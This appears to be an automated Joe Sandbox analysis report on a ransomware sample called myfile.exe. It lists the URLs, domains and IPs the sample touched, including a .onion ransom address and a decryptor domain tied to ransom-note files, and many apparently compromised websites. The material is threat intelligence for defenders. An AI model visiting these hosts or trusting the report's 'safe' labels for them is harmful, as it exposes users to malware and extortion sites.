                                                              https://s3.amazonaws.com/a.storyblok.com/f/20myfile.exe, 00000000.00000002.2895361971.000000000439F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589306558.000000000439D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://karnesstanleyhvac.com/content/images/gv.pngpngmyfile.exe, 00000000.00000003.2468286003.0000000001071000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://www.bundan.com/wp-json/myfile.exe, 00000000.00000003.2839682725.000000000103D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://almamidwifery.com/myfile.exe, 00000000.00000002.2895379820.0000000005B3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • 1%, Virustotal, Browse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://a.storyblok.com/f/201186/538x872/eb9c0d6ee6/attraction-main-court.pngmyfile.exe, 00000000.00000003.2503575660.0000000005B27000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://90nguyentuan.com/wp-content/pics/rbfaqbvnxelf.jpgmyfile.exe, 00000000.00000003.2354497266.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382703447.0000000001058000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354771647.0000000001059000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365282654.0000000001058000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://business-basic.de/wp-content/plugins/under-construction-page/themes/css/bootstrap.min.css?v=myfile.exe, 00000000.00000003.2468286003.0000000001003000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • 0%, Virustotal, Browse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://www.almamidwifery.com/~myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://testitjavertailut.net/myfile.exe, 00000000.00000003.2589691593.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001051000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • 2%, Virustotal, Browse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://www.chainofhopeeurope.eu/wp-content/themes/lcde-single/img/icons/favicon.icomyfile.exe, 00000000.00000003.2600172847.0000000001003000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://innervisions-id.com/pngmyfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://amelielecompte.wordpress.com/0myfile.exe, 00000000.00000003.2556494998.0000000001071000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061myfile.exe, 00000000.00000003.1934915360.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589188241.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2155301553.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1942076208.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1980534561.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2008810311.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1890024433.0000000002C45000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2025165555.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1890097726.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894500583.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1890052478.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, g165067x37-readme.txt37.0.dr, g165067x37-readme.txt16.0.dr, g165067x37-readme.txt29.0.dr, g165067x37-readme.txt4.0.dr, g165067x37-readme.txt56.0.dr, g165067x37-readme.txt23.0.dr, g165067x37-readme.txt61.0.dr, g165067x37-readme.txt45.0.dr, g165067x37-readme.txt62.0.dr, g165067x37-readme.txt32.0.drtrue
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://hostaletdelsindians.es:443/news/temp/wpuatzictpgv.jpggx.gifagemyfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://innervisions-id.com/wp-content/images/kpgkqb.jpgqmyfile.exe, 00000000.00000002.2895361971.000000000439F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://vitoriaecoturismo.com.br/myfile.exe, 00000000.00000003.2600172847.0000000001071000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • 2%, Virustotal, Browse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://innervisions-id.com:443/wp-content/images/kpgkqb.jpg.gife0myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://innervisions-id.com/wp-content/images/kpgkqb.jpgwmyfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://m2graph.fr:443/news/pics/sovuwxryinfm.pngfc/lgul.jpg4692bmyfile.exe, 00000000.00000003.2468286003.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://princebet88.site/assets/images/logo-princebet88.webpmyfile.exe, 00000000.00000003.2589424950.0000000005B61000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589328177.0000000002C6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://chomiksy.net/pngmyfile.exe, 00000000.00000003.2600172847.0000000001003000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://innervisions-id.com/wp-content/images/kpgkqb.jpgrmyfile.exe, 00000000.00000002.2895379820.0000000005B1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://images.squarespace-cdn.com/content/v1/5ad68080a9e028226c1155ed/1526923138735-EF8ZSSLD6TS2M24Bmyfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://a.storyblok.com/f/201186/174x174/6a375a03d8/become-a-member-new.pngmyfile.exe, 00000000.00000003.2493549290.0000000005B3E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://pansionatblago.ru/t$~myfile.exe, 00000000.00000003.2382483791.0000000001071000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://schema.orgmyfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354497266.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839682725.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://amelielecompte.wordpress.com/Qmyfile.exe, 00000000.00000003.2556494998.0000000001071000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://amelielecompte.wordpress.com/Omyfile.exe, 00000000.00000003.2556494998.0000000001071000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://bd2fly.com:443/static/game/nkfydhwjjfbipa.jpgicgx.jpgurce0myfile.exe, 00000000.00000003.2468286003.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://a.storyblok.com/f/201186/428x668/95a47a6a61/updatedmobilehero.jpgmyfile.exe, 00000000.00000003.2503575660.0000000005B27000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/myfile.exe, 00000000.00000003.1647825574.0000000002C40000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1647839842.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1889990480.0000000002C52000.00000004.00000020.00020000.00000000.sdmptrue
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://chomiksy.net:443/wp-content/temp/vudowd.png811-000d3aa4692bmyfile.exe, 00000000.00000003.2600172847.0000000001023000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://www.hostaletdelsindians.es/wp-content/plugins/gtranslate/gtranslate-style24.css?ver=6.0.9myfile.exe, 00000000.00000002.2894114349.0000000001043000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://avisioninthedesert.com/myfile.exe, 00000000.00000003.2354497266.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382703447.0000000001058000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354771647.0000000001059000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365282654.0000000001058000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://www.bundan.com/myfile.exe, 00000000.00000003.2839682725.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001043000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://nbva.co.uk/wp-json/myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://princebet88.site/amp/myfile.exe, 00000000.00000002.2894563140.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589424950.0000000005B61000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589381515.0000000002C66000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589450602.0000000005B15000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589450602.0000000005B60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://bayshoreelite.com/feed/myfile.exe, 00000000.00000003.2600172847.0000000001003000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://parksideseniorliving.net/#/schema/logo/image/myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://yoast.com/wordpress/plugins/seo/myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354497266.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839682725.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://chainofhopeeurope.eu/?myfile.exe, 00000000.00000003.2589691593.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2556494998.0000000001051000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://lexced.com/myfile.exe, 00000000.00000003.2503875458.0000000001039000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://avisioninthedesert.com/wp-content/graphic/lgul.jpgmyfile.exe, 00000000.00000003.2468286003.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354497266.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382703447.0000000001058000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354771647.0000000001059000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365282654.0000000001058000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354497266.0000000001023000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://mursall.de/comments/feed/myfile.exe, 00000000.00000003.2600006397.0000000005B1B000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001003000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://a.storyblok.com/f/201186/173x191/ff8a0137ac/frame-8707-3.pngmyfile.exe, 00000000.00000003.2493549290.0000000005B3E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://a.storyblok.com/f/201186/1920x2746/013c53af19/truegrit_full_light.jpgmyfile.exe, 00000000.00000003.2503575660.0000000005B27000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://mieleshopping.it:443/wp-content/game/doiathwnvkwf.gifa4692bmyfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://pansionatblago.ru/myfile.exe, 00000000.00000003.2382483791.0000000001071000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000000FDC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://m2graph.fr/Fmyfile.exe, 00000000.00000003.2468286003.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589691593.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2556494998.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839682725.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://chomiksy.net/myfile.exe, 00000000.00000003.2589691593.0000000001071000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://ikadomus.com/news/tmp/zrxchmwcslab.gifmyfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://satoblog.org:443/uploads/image/fixizcyhfz.jpgrcesmyfile.exe, 00000000.00000003.2382483791.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001023000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://www.lexced.com/static/tmp/vd.gifLMEMHmyfile.exe, 00000000.00000003.2503875458.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000000FDC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://afbudsrejserallinclusive.dk/uploads/assets/xwncifkynx.gifHkmyfile.exe, 00000000.00000003.2503677440.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589691593.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839682725.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600404554.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001043000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://chainofhopeeurope.eu/(myfile.exe, 00000000.00000003.2556494998.0000000001051000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://afbudsrejserallinclusive.dk:443/uploads/assets/xwncifkynx.gifagemyfile.exe, 00000000.00000003.2468286003.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000001023000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://decryptor.top/myfile.exe, 00000000.00000003.1647825574.0000000002C40000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1647839842.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1889990480.0000000002C52000.00000004.00000020.00020000.00000000.sdmptrue
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://activeterroristwarningcompany.com:443/news/pics/dpgo.gifyc.jpgbudsrejserallinclusive.dk/uplomyfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://avisioninthedesert.com/~myfile.exe, 00000000.00000003.2354497266.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354771647.0000000001059000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365282654.0000000001058000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://ikadomus.com:443/news/tmp/zrxchmwcslab.gifiathwnvkwf.gife0myfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://www.lexced.com/?s=myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://s3.amazonaws.com/a.storyblok.com/f/201186/x/9041c53c26/masifardcn-medium.otf)myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://innervisions-id.com/wp-content/images/kpgkqb.jpg/gmyfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs
                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              160.153.0.131
                                                              lashandbrowenvy.comUnited States
                                                              21501GODADDY-AMSDEtrue
                                                              160.153.0.174
                                                              bayshoreelite.comUnited States
                                                              21501GODADDY-AMSDEtrue
                                                              95.130.22.108
                                                              mursall.deGermany
                                                              13246INETWIRE-ASWilhelm-Wagenfeld-Str16DEtrue
                                                              172.67.71.217
                                                              altitudetrampolinepark.comUnited States
                                                              13335CLOUDFLARENETUSfalse
                                                              80.158.2.41
                                                              oscommunity.deGermany
                                                              6878AS6878DEtrue
                                                              208.73.140.70
                                                              karnesstanleyhvac.comUnited States
                                                              32425SKB3-ARIN-BGPUStrue
                                                              52.215.137.200
                                                              georgemuncey.comUnited States
                                                              16509AMAZON-02UStrue
                                                              95.215.226.251
                                                              innervisions-id.comUnited Kingdom
                                                              9009M247GBtrue
                                                              85.10.140.71
                                                              relevantonline.euFrance
                                                              21283A1SI-ASA1SlovenijaSItrue
                                                              192.0.78.13
                                                              lb.wordpress.comUnited States
                                                              2635AUTOMATTICUSfalse
                                                              198.185.159.145
                                                              almamidwifery.comUnited States
                                                              53831SQUARESPACEUStrue
                                                              185.68.16.21
                                                              maxcube24.com.uaUkraine
                                                              200000UKRAINE-ASUAtrue
                                                              198.185.159.144
                                                              ext-sq.squarespace.comUnited States
                                                              53831SQUARESPACEUSfalse
                                                              87.118.122.41
                                                              lexced.comGermany
                                                              31103KEYWEB-ASDEtrue
                                                              46.242.240.159
                                                              skoczynski.euPoland
                                                              12824HOMEPL-ASPLtrue
                                                              35.215.83.253
                                                              parksideseniorliving.netUnited States
                                                              19527GOOGLE-2UStrue
                                                              185.58.213.84
                                                              rsidesigns.comDenmark
                                                              201595MONODKtrue
                                                              217.160.0.18
                                                              magrinya.netGermany
                                                              8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                              138.201.61.68
                                                              afbudsrejserallinclusive.dkGermany
                                                              24940HETZNER-ASDEtrue
                                                              172.67.158.62
                                                              princebet88.siteUnited States
                                                              13335CLOUDFLARENETUSfalse
                                                              109.237.132.56
                                                              holocine.deGermany
                                                              45012CLOUDPITDEtrue
                                                              85.92.72.56
                                                              nbva.co.ukUnited Kingdom
                                                              34282UKNOC-ASGBtrue
                                                              23.236.62.147
                                                              c-sprop.comUnited States
                                                              15169GOOGLEUSfalse
                                                              188.246.227.29
                                                              abulanov.comRussian Federation
                                                              50340SELECTEL-MSKRUtrue
                                                              188.40.30.106
                                                              business-basic.deGermany
                                                              24940HETZNER-ASDEtrue
                                                              89.116.147.189
                                                              m2graph.frLithuania
                                                              15419LRTC-ASLTtrue
                                                              188.114.97.3
                                                              altitudeboise.comEuropean Union
                                                              13335CLOUDFLARENETUStrue
                                                              141.95.251.157
                                                              stage-infirmier.frGermany
                                                              680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesetrue
                                                              89.108.65.79
                                                              pansionatblago.ruRussian Federation
                                                              197695AS-REGRUtrue
                                                              51.15.159.75
                                                              chainofhopeeurope.euFrance
                                                              12876OnlineSASFRtrue
                                                              188.114.96.3
                                                              testitjavertailut.netEuropean Union
                                                              13335CLOUDFLARENETUStrue
                                                              35.214.211.239
                                                              bundan.comUnited States
                                                              19527GOOGLE-2UStrue
                                                              134.209.129.254
                                                              vitoriaecoturismo.com.brUnited States
                                                              14061DIGITALOCEAN-ASNUStrue
                                                              185.15.78.186
                                                              hostaletdelsindians.esSpain
                                                              48348CLOUDBUILDERSEStrue
                                                              104.26.0.120
                                                              www.altitudetrampolinepark.comUnited States
                                                              13335CLOUDFLARENETUSfalse
                                                              35.214.166.193
                                                              www.mieleshopping.itUnited States
                                                              19527GOOGLE-2UStrue
                                                              Joe Sandbox version:40.0.0 Tourmaline
                                                              Analysis ID:1507821
                                                              Start date and time:2024-09-09 12:05:07 +02:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 5m 7s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:8
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:myfile.exe
                                                              Detection:MAL
                                                              Classification:mal100.rans.troj.evad.winEXE@4/287@54/36
                                                              EGA Information:
                                                              • Successful, ratio: 100%
                                                              HCA Information:
                                                              • Successful, ratio: 100%
                                                              • Number of executed functions: 61
                                                              • Number of non-executed functions: 10
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe
                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size getting too big, too many NtCreateFile calls found.
                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                              TimeTypeDescription
                                                              06:07:04API Interceptor33x Sleep call for process: myfile.exe modified
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              192.0.78.13http://janecreativetileimp.wordpress.com/Get hashmaliciousUnknownBrowse
                                                              • janecreativetileimp.wordpress.com/
                                                              http://deanthapillaystrategyinsights.wordpress.comGet hashmaliciousUnknownBrowse
                                                              • deanthapillaystrategyinsights.wordpress.com/
                                                              198.185.159.145firmware.armv7l.elfGet hashmaliciousUnknownBrowse
                                                              • 198.185.159.145/
                                                              firmware.i586.elfGet hashmaliciousUnknownBrowse
                                                              • 198.185.159.145/
                                                              eqqjbbjMlt.elfGet hashmaliciousUnknownBrowse
                                                              • uwemusic.com/
                                                              FXja4SyAYs.exeGet hashmaliciousUnknownBrowse
                                                              • familycompany.net/index.php
                                                              FXja4SyAYs.exeGet hashmaliciousUnknownBrowse
